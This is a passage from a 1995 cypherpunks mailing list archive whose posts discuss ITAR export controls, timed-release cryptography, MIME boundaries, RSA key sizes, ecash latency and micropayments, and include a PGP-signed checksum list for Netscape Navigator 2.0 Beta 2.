liability."

So in this case I think widespread publicity about the ITARs can be
considered harmful.  All those helpful people going around warning others
that they are exporting software are actually removing a defense against
charges of export.

Hal





From beavis at bioanalytical.com  Thu Nov  9 08:23:00 1995
From: beavis at bioanalytical.com (Beavis B. Thoopit)
Date: Fri, 10 Nov 1995 00:23:00 +0800
Subject: Timed-release crypto and information economics
In-Reply-To: <47m82v$4p4@yage.tembel.org>
Message-ID: <199511091558.KAA00768@bioanalytical.com>


I have not yet convinced myself that a time-release information device
is impossible....

Does there exist a storage device that, due to _dynamics_ (or other
factor), prevents the total contents being read in one instance?

Bubble memory device?  Torsion wire memory device?

Back at IBM, an old school customer engineer friend of mine used to
bring in relics of IBM's illustrious past.  One curious device was a
memory device for an old terminal.  This device consisted of about
10 feet of piano wire coiled into a spiral of about 6 inches diameter.
An acuator would "twist" torsion waves onto the end of the wire.
These waves would propagate down the wire and would be sensed falling
off the opposite end.  About 400+ bits could be stored on the wire by
twisting (cwise/0 or ccwise/1) them onto one end, sensing them as
they came off, and re-twisting them back on.  The bits chased each
other around this loop.

Assume that I can only read the bits as they fall off the end (one
bit at a time).
Assume a transformation function (with state) in the middle of the
"wire" which cryptographically transforms the bits.
Assume a device that holds 2^somewhatbig bits.
Assume a traversal delay around the device of 1 unit.
Assume disturbing the device ("grabbing the wire") destroys the information.
Assume the message sender loads the wire with an "encrypted" message.

Can I precompute a message that after N iterations around the "wire"
(and through the transform) will spill out plaintext (N time units
into the future)?
Does such a tranformation exist?  (rings of the technology in S/key...)





From dcrocker at brandenburg.com  Thu Nov  9 08:43:57 1995
From: dcrocker at brandenburg.com (Dave Crocker)
Date: Fri, 10 Nov 1995 00:43:57 +0800
Subject: Mime/multipart (was Re: PGP Comment feature weakens remailer security)
Message-ID: <v03003b18acc7d3c77b54@[204.118.88.32]>


At 5:56 AM 11/9/95, Laurent Demailly wrote:
>I've waited a bit, but as nobody seem to have pointed out, you can
>definitly find a unique stream in a *single* pass (but maybe what you
>really want is no pass at all ?)

	engineering versus math.

	you can do it in zero passes, sort of.

	Generate a heafty pseudorandom number and convert it to a heafty
ascii string.  What are the odds that that string will appear in ANY kind
of data you are generating?  Low.  Measured in years and probably decades.

	As you do the mime encapsulation, also scan for a collision.  When
you get it (once every 20 years or so), abort the processing and start over.

d/

--------------------
Dave Crocker                                                +1 408 246 8253
Brandenburg Consulting                                fax:  +1 408 249 6205
675 Spruce Dr.                                     dcrocker at brandenburg.com
Sunnyvale, CA  94086 USA                         http://www.brandenburg.com







From hallam at w3.org  Thu Nov  9 09:10:17 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 10 Nov 1995 01:10:17 +0800
Subject: Worth of Crypto Consulting
In-Reply-To: <199511090735.BAA01846@monad.armadillo.com>
Message-ID: <9511091650.AA22280@zorch.w3.org>



>I was wondering what "real" crypto consultants are getting these days.

I know some people who charge $500 a day and others who charge $5000
It basically depends on reputation and knowledge.

	Phill





From raph at CS.Berkeley.EDU  Thu Nov  9 10:10:07 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Fri, 10 Nov 1995 02:10:07 +0800
Subject: Mime/multipart (was Re: PGP Comment feature weakens remailer security)
In-Reply-To: <9511091356.AA09725@hplyot.obspm.fr>
Message-ID: <199511091715.JAA12871@kiwi.cs.berkeley.edu>


> Raph Levien writes:
>  >    On an unrelated topic... cypherpunks like to count bits, right?
>  > What is the correct number of pseudorandom bits to use in a MIME
>  > multipart separator? If the data has a line which matches the
>  > separator, the message is corrupted. Of course, if you can take
>  > multiple passes through the data, you can simply verify that it does
>    ***************
> No need !
>  > not contain a line which matches the separator. But if you're
>  > restricted to a single pass, then the only way to do it is to use a
>  > randomly generated separator.
> I've waited a bit, but as nobody seem to have pointed out, you can
> definitly find a unique stream in a *single* pass (but maybe what you
> really want is no pass at all ?)
> {you add a new random byte each time you find your sequence in the
> stream, and goes forward (as the previous separator was not in the
> "past" of the stream, you don't need to go back)}

Yes, that's a good strategy _if_ you're able to take multiple passes.
However, the separator must (of course) appear at the top of the multipart
message being assembled. Perhaps we don't agree on what "single pass"
means; I meant you could do the processing in a Unix pipe without
requiring storage proportional the size of the data.

> What am I missing ? (anyway, see below)
> (I hope my answer is not as clueless as the "A-dice anonymous" one)

Not quite. As they say, "A-dice" is not merely clueless, but actually
clue-resistant.

>  >    I figure that 128 bits should _definitely_ be enough (that's what
>  > is in the new premail code now). Even 64 bits should ensure that it is
>  > unlikely that anyone will ever experience message corruption over the
>  > expected lifetime of premail. However, it makes me nervous. What do
>  > people think?
> 
> Isn't PGP encoded stream containing only base64 chars ? Why not use
> "====PGP part #===="  (as you can't have more than 2 = in a base 64,
> and only at the end anyway)
> or "@PGP part #" or whatever starting with a non base64 char ?

For PGP encrypted messages, I just use "+" as the boundary, as it is
guaranteed that a valid PGP/MIME multipart/encrypted message body will
never include the line "--+" or "--+--". For the longer separators, my
concern is multipart/signed messages.

> so "@" = 8 bits is my anwser, do I win ;-) ?

I chose "+" instead of, say, "@" because it will survive EBCDIC gateways.
You might argue that this is worrying too much, but doing the right thing
here costs nothing, and may actually save somebody some trouble.

Raph







From scottst at ionet.net  Thu Nov  9 10:17:29 1995
From: scottst at ionet.net (Scott Staedeli)
Date: Fri, 10 Nov 1995 02:17:29 +0800
Subject: Pegasus Mail 2.20
Message-ID: <199511091727.LAA14980@ion1.ionet.net>


> From:          Rich Salz <rsalz at osf.org>
> Date:          Thu, 9 Nov 1995 07:50:44 -0500
> To:            scottst at ionet.net
> Subject:       Re:  Pegasus Mail 2.20
> Cc:            cyperphunks at osf.org

> I sure hope some tells David Harris that his program is now export
> controlled.  From my reading of his message, it seemed like he thinks he
> "beat the system" because he didn't include actual crypto code.
> 
> Software that says "plug your own crypto here" is considered an anciliarry
> device according to the ITAR.  Or, as I heard some NSA people call it,
> "the classic 'crypto with a hole'."  Seems kinda silly that the hole is
> the crypto, but hey that anciliiary device clause, you just gotta love
> it.
> 
> If Pegasus mail were written to support generic user-loadable content
> transforms, that would be different.  But even then, you have to be careful
> how that's done.  If just did some global search-and-replace and came up
> with "keyed compression" you wouldn't get past anyone.  But if you had an
> opaque state block that the user modules could set/use/clear, and you
> passed that along with your in/out buffers, then you'd be safe.  Of course,
> they'd know what is really going on, but are powerless to prevent it.
> 	/r$
> 

   Actually, David Harris is a citizen of New Zealand. If the US government 
tries anything, at least we'll know if ITAR applies to foreign written 
freeware.
--scottst at ionet.net------http://www.ionet.net/~scottst--
   >~<^xXx       | "The Internet is simply a means of 
        xX   #   | communication. Efforts to stop infor-
      (XXX) #    | mation by enjoining it are doomed to
    (XXXXXXX)    | failure in a free society."
DON'T TREAD ON ME|        -- Prof. Frank Tuerkheimer
========================================================
=========NSA trip phrase of the week: DEUTERIUM=========





From raph at CS.Berkeley.EDU  Thu Nov  9 10:20:49 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Fri, 10 Nov 1995 02:20:49 +0800
Subject: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091413.JAA15288@jekyll.piermont.com>
Message-ID: <199511091725.JAA17620@kiwi.cs.berkeley.edu>


> > I agree entirely. That's why my PGP key at school is 382 bits. It's a
> > lot easier to compromise my machine than factor a 382 bit number.
> 
> On the other hand, it costs nothing by most people's standards to use
> a 1024 bit key, so why not use one? I find that there is only a point
> in using low security for anything in particular when there is a
> perceivable cost to it -- if the cost is typing a different number
> while doing key generation, I don't see why one should suffer the
> tradeoff.

Perhaps it costs you "nothing," Perry, but not all of us have the
massively parrallel 64-way interleaved banked memory nanosecond-latency
box you have on your desk.

Since RSA decryption is cubic in key size, it takes about twenty times
as long to sign or decrypt a message. Since latency-hiding (for example,
caching the decrypted session keys) is not widely implemented, the user
actually sees the difference.

For applications such as remailers, a 20-fold factor can make the
difference between smooth operation and totally hosing the machine.

Another reason to use small keys is to communicate the relative insecurity
of the machine to senders. A 382-bit key says, loud and clear, "don't send
sensitive or incriminating information using this key."

Raph






From tcmay at got.net  Thu Nov  9 10:24:19 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 02:24:19 +0800
Subject: Timed-release crypto and information economics
Message-ID: <acc774f813021004a77a@[205.199.118.202]>


At 3:58 PM 11/9/95, Beavis B. Thoopit wrote:

>Does there exist a storage device that, due to _dynamics_ (or other
>factor), prevents the total contents being read in one instance?
>
>Bubble memory device?  Torsion wire memory device?

"All crypto is economics."

There's a literature of sorts on "tamper-resistant modules," or
"tamper-responding modules." Chips or packages that either resist tampering
(= reading, opening, etc.) or that give indication they have been read,
opened, or otherwise accessed.

"Quantum cryptography" aims at providing a "read only once" system. Consult
the vast number of articles and comments available.

Basically, any secret stored in (traditional) hardware can be gotten with
enough money. The issue is the amount of money it takes, and how many
tries, to open the hardware.

(And it may take a lot. Or destroy a lot of chips in the process. The
similarities to bomb disposal are obvious: it may be _possible_ to disarm a
bomb, but a lot of "learning" is likely to take place first.)

Search the archives if you wish for previous articles I and others have
written on reverse-engineering chips with electron beam probes, for
example.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From tcmay at got.net  Thu Nov  9 10:27:13 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 02:27:13 +0800
Subject: Caching Cash (ecash speed)
Message-ID: <acc7778214021004402c@[205.199.118.202]>


At 9:14 AM 11/9/95, Bill Stewart wrote:

>For penny-a-page on-line services, unless ecash transaction costs are
>_radically_
>cheap, it probably makes more sense for the service to sell its own tokens,
>bought with (anonymous or non-anonymous) ecash, which you then trade for pages.
>No calculation required, just an on-line lookup for double-spending
>and you don't get your page if you double-spend.  An alternative to them
>picking the token numbers is for you to give them the numbers and them
>to keep them in their database, but that's probably unlikely to be done
>and doesn't really buy you much privacy.
>
>If that's not anonymous enough for you (because your IP address could be
>traced when you buy the tokens, and coordinated with them later),
>use a packet laundry, or connect from your dialup access provider,
>which will tell the newspaper you're port43.server29.netcom.com or
>something equally uninformative; or dial in from the public library or cafe.

Tokens, coupons, gift certificates, etc., are all good examples of
_caching_. As, looked at in a certain way, ordinary folding or jangling
cash is an example of caching. (Yes, quibblers, it is true that we view
folding money as "real money," but really it's a series of claims against
some store of value, formerly gold and silver, and now...?)

Instead of constant interactions with a bank, we place money in "cash
memory" (I mean, "cache memory").

The concerns Hal raises about ecash speed are important. CPU speeds are not
the problem, network speeds are---many home and small business users have
very fast CPUs, able to funtion as Web servers all by themselves, but have
relatively slow network connections.

So, various schemes for reducing the network bottlenecks will be likely.

Tokens are a good example. And as Bill notes, token laundries can make them
_effectively_ untraceable, good enough for many of the low-value
transactions for which they are intended. (As usual, more security means
more computation, more delay, all other things being equal.
"TANSTAAFL"--There Ain't No Such Thing As A Free Lunch.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From hfinney at shell.portal.com  Thu Nov  9 10:34:18 1995
From: hfinney at shell.portal.com (Hal)
Date: Fri, 10 Nov 1995 02:34:18 +0800
Subject: New patent rules
Message-ID: <199511091751.JAA15752@jobe.shell.portal.com>


Reading the latest Foresight Update articles in the sci.nanotech newsgroup,
I came upon an analysis of upcoming changes to the patent laws.  With
the signing of the GATT treaty the laws will change next year.  here
is one of the changes, quoting from the article:

    Infringement. Present U.S. patent law grants to a patent
    holder the right to exclude others from making, using, or selling the
    patented invention in the United States.  After about January 1, 1996,
    a patent holder has the right to exclude others also from offering for
    sale patented products or products made using a patented process.
    Thus, under the law as amended, the mere offer for sale of a patented
    product may be treated as an infringing act.  In addition, it will be
    illegal to import a product covered by a U.S. patent.

At first I thought this would not have much impact on crypto software,
which is of course heavily patented.  The current laws already prevent
people from making, using, or selling software which uses patented
algorithms.  The new restrictions on products made using a patented
process would not seem to be relevant.

But there is a possible interpretation which would be very significant.
What if data which has had cryptographic transformations applied were
viewed as a product of a possibly patented process?  An RSA-signed or
-encrypted message might then be such a product.  A blinded coin or other
credential, a key signature or certificate, virtually all of the things
we are interested in could be thought of in those terms.

We have occasionally discussed setting up offshore servers and such to
perform patented cryptographic algorithms.  But if the resulting data
is itself illegal to import, that would make this strategy much more
difficult.  Would it become illegal to "import" messages from
non-RSAREF versions of PGP, or to hand someone a Chaum-type cash token
issued by an offshore bank in a jurisdiction where his patents don't
apply?

I wonder if the lawyers on the list have any thoughts about whether such
an interpretation of the GATT rules is likely to stand.

Hal





From rmartin at aw.sgi.com  Thu Nov  9 11:04:09 1995
From: rmartin at aw.sgi.com (Richard Martin)
Date: Fri, 10 Nov 1995 03:04:09 +0800
Subject: [Sci-Fi] Re: expiration dates on cryptography
In-Reply-To: <acc62dde07021004cd59@[205.199.118.202]>
Message-ID: <9511081824.ZM25431@glacius.alias.com>


For methods of jiggering physical clocks, one might eventually reach the
stage of attempting to have physically unjiggable clocks. [Well, theoretically
unjiggable, just as our hideously huge composites are thought unfactorable
by computability arguments.]

Example:
I have a piece of information which I wish to remain secret until a well-
defined date in the future. I encrypt it then lob a package containing
the information into a well-defined and predictable trajectory which will
cause it to intersect the earth's trajector at that time [or shortly
thereafter]. I would [guess, hope, no, I haven't sat here and calculated]
that there should exist possible systems where beyond an initial period of
about a week, there would be no earthly technology capable of catching
up with the packet.

Alright, so it's hideously expensive. But you could put a lot of information
into one packet. Apollo Assured Archiving could have fixed rates per megabyte,
with regular [monthly?] launches into reliable orbits. At which point the
joy becomes making sure there aren't packet-catching bases on the far
side of Mercury... [with the mind control lasers, of course]

frodo

--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992





From jsw at netscape.com  Thu Nov  9 11:04:46 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Fri, 10 Nov 1995 03:04:46 +0800
Subject: checksums for Netscape Navigator 2.0 Beta 2
Message-ID: <199511091816.KAA04865@ghoti.mcom.com>


-----BEGIN PGP SIGNED MESSAGE-----

  This file contains checksums for the Netscape Navigator 2.0 Beta 2
distribution files that are available on the Netscape ftp
site under the directory ftp://ftp.netscape.com/2.0beta/.  This file
has been digitally signed using PGP to assure its authenticity.  The
version of PGP which was used to create the digital signature
on this document was obtained from http://bs.mit.edu:8001/pgp-form.html/.

  This file was signed using my personal PGP key.  My PGP public key, which
can be used to verify the signature on this file, can be obtained from
my web page using this URL:

	http://home.netscape.com/people/jsw/my-pgp-key.txt

or by searching for 'jsw at netscape.com' from the PGP key server at mit:

	http://www-swiss.ai.mit.edu/~bal/pks-commands.html#extract

  There are three sets of checksums in this file.  The first set of
checksums uses MD5 to create 128-bit checksums that can not be forged.
The second and third sets of checksums were generated using the two
forms of the unix 'sum' command.  The 'sum' command creates a 16-bit
checksum, which can be used detect accidental corruption during download,
but is too small to protect you from malicious tampering.

  There are two version of the checksums for the unix 'sum' command because
unix vendors follow two different standards.  I have labeled the
checksums with the systems that they are good for.  If you are performing
the checksum operation on a unix system that is not listed, check both
lists and make sure that one matches.  Note that some Sun systems have
both versions of the sum command, so the results you get will depend
on your shell PATH variable.

	--Jeff

========================================================

These MD5 checksums were generated with the 'md5sum' program from the PGP2.6.2
distribution, which was obtained from http://bs.mit.edu:8001/pgp-form.html/.

f4624a2afa4fbab3b91df62a9c9ebe71  unix/netscape-v20b2-export.alpha-dec-osf2.0.tar.Z
0039da76358854a8dbf81297f8695aa4  unix/netscape-v20b2-export.hppa1.1-hp-hpux.tar.Z
cbf1b480f74cd0f3545184f441670a81  unix/netscape-v20b2-export.i386-unknown-bsd.tar.Z
b5e27641d344cafb15711ccabd02aa62  unix/netscape-v20b2-export.i486-unknown-linux.tar.Z
cb22244b63c4b1f0a484a10a2bed3059  unix/netscape-v20b2-export.mips-sgi-irix5.2.tar.Z
160a862a2628a80dd68a9cccccb1a938  unix/netscape-v20b2-export.rs6000-ibm-aix3.2.tar.Z
2b90a96e95f28867b62d037df4e98c9d  unix/netscape-v20b2-export.sparc-sun-solaris2.3.tar.Z
4352513f5672c7292bf2d47a2bb61ecd  unix/netscape-v20b2-export.sparc-sun-solaris2.4.tar.Z
faaebbbc60565fbe9ab6d36b22dfc375  unix/netscape-v20b2-export.sparc-sun-sunos4.1.3_U1.tar.Z
d6641fbd95fcf5b27b5f07766f688f3a  mac/netscape-2.0b2.hqx
00949f13e3b663dbe8cce6da3be2c39a  windows/n1620b2a.exe
06c3e13f81bc3086c3a49b4268718d2a  windows/n32e20b2.exe

========================================================

These checksums were generated using the Unix 'sum' command.  These checksums
are for the form of the sum command that is on Sun, SGI IRIX and HPUX systems.

61292 4184 unix/netscape-v20b2-export.alpha-dec-osf2.0.tar.Z
1449 6837 unix/netscape-v20b2-export.hppa1.1-hp-hpux.tar.Z
18430 4342 unix/netscape-v20b2-export.i386-unknown-bsd.tar.Z
36543 4298 unix/netscape-v20b2-export.i486-unknown-linux.tar.Z
39565 4718 unix/netscape-v20b2-export.mips-sgi-irix5.2.tar.Z
37161 3554 unix/netscape-v20b2-export.rs6000-ibm-aix3.2.tar.Z
49003 5273 unix/netscape-v20b2-export.sparc-sun-solaris2.3.tar.Z
2638 3733 unix/netscape-v20b2-export.sparc-sun-solaris2.4.tar.Z
7356 10974 unix/netscape-v20b2-export.sparc-sun-sunos4.1.3_U1.tar.Z
26809 5065 mac/netscape-2.0b2.hqx
26811 4017 windows/n1620b2a.exe
59280 5512 windows/n32e20b2.exe

========================================================

These checksums were generated using the Unix 'sum' command.  These checksums
are for the form of the sum command that is on Sun, DEC OSF/1, AIX, BSDI, and
Linux systems.

62443  2092 unix/netscape-v20b2-export.alpha-dec-osf2.0.tar.Z
61292  3419 unix/netscape-v20b2-export.hppa1.1-hp-hpux.tar.Z
61270  2171 unix/netscape-v20b2-export.i386-unknown-bsd.tar.Z
06430  2149 unix/netscape-v20b2-export.i486-unknown-linux.tar.Z
23707  2359 unix/netscape-v20b2-export.mips-sgi-irix5.2.tar.Z
36711  1777 unix/netscape-v20b2-export.rs6000-ibm-aix3.2.tar.Z
60075  2637 unix/netscape-v20b2-export.sparc-sun-solaris2.3.tar.Z
22223  1867 unix/netscape-v20b2-export.sparc-sun-solaris2.4.tar.Z
13909  5487 unix/netscape-v20b2-export.sparc-sun-sunos4.1.3_U1.tar.Z
16389  2533 mac/netscape-2.0b2.hqx
38581  2009 windows/n1620b2a.exe
58788  2756 windows/n32e20b2.exe

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKJFGKwWZfp0yzT1AQGxagP+I81vOCxoKOiqo6oJOYs4YeySjz1Yli9d
LmdEXJ6FIsFeiPMws8nTirH3NFNGMSp2jlmfs4ySCh0v4w6xwbZFUpNldnMz0N5c
IBUFi5Xcv5qF1aNezkkDVGkFJLfNTuVmXm3LChr1kxVifcsM52vLJis6QzgkwGCT
RTs0G3Xwo5s=
=1b+c
-----END PGP SIGNATURE-----
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From beavis at bioanalytical.com  Thu Nov  9 11:37:30 1995
From: beavis at bioanalytical.com (Beavis B. Thoopit)
Date: Fri, 10 Nov 1995 03:37:30 +0800
Subject: Timed-release crypto and information economics
In-Reply-To: <199511091621.QAA01045@orchard.medford.ma.us>
Message-ID: <199511091852.NAA01172@bioanalytical.com>


> That's a pretty large number of assumptions:
> 
> 	tamper-proof delay line
> 	=> tamper-proof crypto box ("transformation function with state")
> 	=> tamper-proof delay line
> 
> Why not just put a tamper-proof clock in the tamper-proof crypto box
> and not bother with the delay lines?

The tamper proof aspect is really secondary to the math question.
The idea that if I set up a stream of bits through a transform, that
the original state of the transform affects the final outcome after
N iterations.

If the transform exists, it will ease/eliminate the reliance on the
"economics" of cryptography to build a tamper-proof physical device.

Here is another implementation of the idea:

initialize buffer to '12#fjKL3_*(ASDdj1ll3_13 asdfasd-1-3!#!23'
do forever      /* actually until the plaintext spews out */
  sleep 1 unit
  for each element in the buffer
    buffer[ element ] = magictransform( buffer[ element ] )

The initial buffer must be secret!

Calculating the intial buffer in such a way that after N iterations
the plaintext message appears is what must happen.





From frantz at netcom.com  Thu Nov  9 11:38:57 1995
From: frantz at netcom.com (Bill Frantz)
Date: Fri, 10 Nov 1995 03:38:57 +0800
Subject: Caching Cash (ecash speed)
Message-ID: <199511091850.KAA12286@netcom17.netcom.com>


At 10:41 11/9/95 -0800, Timothy C. May wrote:
>The concerns Hal raises about ecash speed are important. CPU speeds are not
>the problem, network speeds are---many home and small business users have
>very fast CPUs, able to funtion as Web servers all by themselves, but have
>relatively slow network connections.

Tim is of course right that network speeds are the problem.  However, the
network limit is the speed of light and not current network technology.  If
your bank is half-way around the world, the 1/7 second round trip will kill
any chance you have of offering 1/10 second response time.

For some thinking on the subject of caching cash, see the "Digital Silk
Road" paper accessable through the Agorics home page:
http://www.webcom.com/~agorics/

BTW - I don't think we should be talking about a penny/page cost because it
is way too high for the current market.  For example, my copy of Applied
Cryptography V2 cost about $.067/page AND came with the media to keep it
"forever".  My (used) copy of Snow Crash cost closer to a penny/page and
also came with the media.  I would think that somewhere between 1/100 to
1/10 of a penny/page is closer to the current market value of the page
content.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz at netcom.com             Los Gatos, CA 95032, USA







From junger at pdj2-ra.F-REMOTE.CWRU.Edu  Thu Nov  9 11:43:29 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Fri, 10 Nov 1995 03:43:29 +0800
Subject: Pegasus Mail
In-Reply-To: <199511091528.HAA05703@jobe.shell.portal.com>
Message-ID: <m0tDc9b-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>


Hal writes:

: One
: of the elements of the offense of violating the arms export control act
: is that the violation be willful.  The exporter has to violate a known
: legal duty not to export the item.  One of the reasons for this is simply
: that the ITAR list is long and technical and average individuals cannot be
: expected to know all its details.  This is mentioned in the Lizarraga
: case, at approximately 541 F2d 828:

  . . . .
 
: So in this case I think widespread publicity about the ITARs can be
: considered harmful.  All those helpful people going around warning others
: that they are exporting software are actually removing a defense against
: charges of export.

This is a serious problem.  On the other hand there are civil penalties
for violating the ITAR that can be imposed without any showing of
willfulness.  So the non-willfull exporter is still at risk, even if he
does not know it.  And if people are not informed in general, then the
boys from the Office of Defense Trade Controls and NSA, can selectively
inform only those whom they wish to harass, which is perhaps the
nastiest aspect of the ITAR.

The only long term solution is to establish that the ITAR's provisions
relating to cryptographic software are unconstitutional and void.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger at pdj2-ra.f-remote.cwru.edu    junger at samsara.law.cwru.edu





From dee at cybercash.com  Thu Nov  9 11:47:44 1995
From: dee at cybercash.com (Donald E. Eastlake 3rd)
Date: Fri, 10 Nov 1995 03:47:44 +0800
Subject: (cpx) Re: ecash speed
In-Reply-To: <v02120d03acc7c8d9c381@[199.0.65.105]>
Message-ID: <Pine.SUN.3.91.951109140743.26577A-100000@cybercash.com>


There is certaily no need for an extra connection from the merchant back
to the customer.  See draft-eastlake-internet-payment-00.txt.

Donald (not on cybpherpunks)

On Thu, 9 Nov 1995, Robert Hettinga wrote:

> 
> --- begin forwarded text
> 
> Date: Wed, 8 Nov 1995 21:08:51 -0800
> From: Hal <hfinney at shell.portal.com>
> To: cypherpunks at toad.com
> Subject: Re: ecash speed
> Sender: owner-cypherpunks at toad.com
> Precedence: bulk
> 
> "Perry E. Metzger" <perry at piermont.com> writes:
> 
> >Hal writes:
> >> The point is that if the anonymity afforded by ecash is too costly in
> >> terms of time, then we may end up stuck with a non-anonymous system
> >> simply because that is the only one efficient enough to work.  It would
> >> be good to find out if that is a serious problem.
> 
> >I suspect that as CPU speed exponentiates this will become less and
> >less of a problem. It doesn't especially worry me.
> 
> Consider, though, what happens in the current ecash system if it were
> used to charge a penny per page.  You would click on a link in your web
> browser to go to the new page.  It would set the GET request to the
> remote server as usual.
> 
> The server would fire up a CGI script which will run the shop software.
> That software will make a TCP stream connection back to your ecash wallet
> software which is running on the system where your client is.  It sends a
> request to get payed $.01.  Assuming the wallet is configured to
> automatically approve such a payment, it will send a one penny coin to
> the shop software along the opened link.  (This may also involve doing a
> PK encryption on the coin as an anti-theft measure; this aspect of the
> current ecash system is not documented AFAIK.)
> 
> The shop software then opens a TCP stream connection to the bank, and
> forwards the coin there.  The bank receives it, and checks the public
> key signature in the coin.  It then compares the coin against every other
> coin which has ever been spent (within the validity period of the coin)
> to make sure it is not being doubly spent.  If this all checks out it
> sends back some authentication message to the original server.  The shop
> software then delivers the new page to the client browser.
> 
> This all has to happen whenever you click on a link in your browser.
> Even with fast CPU's I think the extra step of connecting to the bank,
> having it check against all coins, and getting approval will be
> considerable for each link traversal.
> 
> Hal
> --- end forwarded text
> 
> 
> -----------------
> Robert Hettinga (rah at shipwright.com)
> Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
> USA (617) 323-7923
> "Reality is not optional." --Thomas Sowell
> >>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<
> 
> 
> 

=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee at cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee at world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)





From mclow at owl.csusm.edu  Thu Nov  9 12:30:29 1995
From: mclow at owl.csusm.edu (mclow at owl.csusm.edu)
Date: Fri, 10 Nov 1995 04:30:29 +0800
Subject: New address
Message-ID: <v03003b0eacc805abfe1d@[204.250.84.3]>


Everyone --

This morning, without any warning, the local university decided to change
all their mail aliases. Mail sent to "mclow at coyote.csusm.edu" now bounces,
and the new address is "mclow at mailhost2.csusm.edu".

Please update your address books.
Sorry about that :-(

P.S. Those of you who send mail to Laurie, her email address is now
	"lclow at mailhost2.csusm.edu"

-- Marshall

Marshall Clow
Aladdin Systems
mclow at mailhost2.csusm.edu
Warning: Objects in calendar are closer than they appear.







From jimbell at pacifier.com  Thu Nov  9 12:30:57 1995
From: jimbell at pacifier.com (jim bell)
Date: Fri, 10 Nov 1995 04:30:57 +0800
Subject: ecash speed
Message-ID: <m0tDcXQ-000900C@pacifier.com>


>At 09:08 PM 11/8/95 -0800, Hal <hfinney at shell.portal.com> wrote:
>>Consider, though, what happens in the current ecash system if it were
>>used to charge a penny per page.  You would click on a link in your web
>>browser to go to the new page.  It would set the GET request to the
>>remote server as usual.
>
>For penny-a-page on-line services, unless ecash transaction costs are
>_radically_
>cheap, it probably makes more sense for the service to sell its own tokens,
>bought with (anonymous or non-anonymous) ecash, which you then trade for pages.
>No calculation required, just an on-line lookup for double-spending
>and you don't get your page if you double-spend.  An alternative to them
>picking the token numbers is for you to give them the numbers and them
>to keep them in their database, but that's probably unlikely to be done
>and doesn't really buy you much privacy.


I think that one thing that's needed is the concept of probabilistic payments.  

The problem:  How do you pay, say, 1/10th of a penny for a good or service
if the minimum denominated coin is a penny?   This is important, because as
we all know the cost of providing computer services of all kinds (and data
transmission) can be expected to continue to drop as time progresses.   If
we allow the minimum size coin to control our lives, it will keep prices
higher than they ought to be and prevent low-cost services from existing.

The answer, I suggest, is that the payer and payee should "flip a coin,"
actually a probability, such that the likelihood of making the payment times
the size of the payment equals the intended payment.

If a seller wants to sell access at 1/10th of a penny per page, he and I can
flip a 10-sided coin (using encryption principles already established)
leading to a 1/10 likelihood that I would have to pay 1 cent, and a 9/10
likelihood that I'll get the service for free.  On the average, it'll be a
payment of 1/10th of a cent.







From perry at piermont.com  Thu Nov  9 12:32:17 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 10 Nov 1995 04:32:17 +0800
Subject: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091725.JAA17620@kiwi.cs.berkeley.edu>
Message-ID: <199511091951.OAA15564@jekyll.piermont.com>



Raph Levien writes:
> > On the other hand, it costs nothing by most people's standards to use
> > a 1024 bit key, so why not use one? I find that there is only a point
> > in using low security for anything in particular when there is a
> > perceivable cost to it -- if the cost is typing a different number
> > while doing key generation, I don't see why one should suffer the
> > tradeoff.
> 
> Perhaps it costs you "nothing," Perry, but not all of us have the
> massively parrallel 64-way interleaved banked memory nanosecond-latency
> box you have on your desk.

I've found that in practice the compression pass takes longer than the
RSA pass for PGP. If you accept the time for the file compression I
don't see how you can have trouble with the 1024 bit RSA operation.

Perry





From anonymous-remailer at shell.portal.com  Thu Nov  9 13:11:02 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 10 Nov 1995 05:11:02 +0800
Subject: Newt on Crypto
Message-ID: <199511080642.WAA04054@jobe.shell.portal.com>


On Tue, 7 Nov 1995, Bill Stewart wrote:

> >From John Young's posting CYB_lip of a column from the Washington Post
> 
> >   "At some point in the not-very-distant future," said
> >   Speaker Newt Gingrich (R-Ga.) in an August interview in
> >   Wired with computer guru Esther Dyson, "somebody is going
> >   to have encryption you can't break.... Governments are not
> >   going to be able to stop it."
> 
